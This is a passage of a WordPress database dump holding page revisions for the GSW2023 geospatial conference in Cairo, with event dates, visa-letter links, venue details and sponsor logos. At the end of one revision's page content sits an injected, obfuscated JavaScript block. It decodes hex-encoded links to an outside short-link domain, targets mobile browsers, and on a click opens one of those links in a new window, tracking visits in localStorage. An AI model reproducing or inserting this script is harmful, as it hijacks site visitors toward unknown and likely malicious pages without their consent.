0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:16:51','2023-08-16 00:16:51','',3066,'https://gsw2023.com/?p=5241',0,'revision','',0),
(5242,1,'2023-08-16 00:17:29','2023-08-16 00:17:29','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter 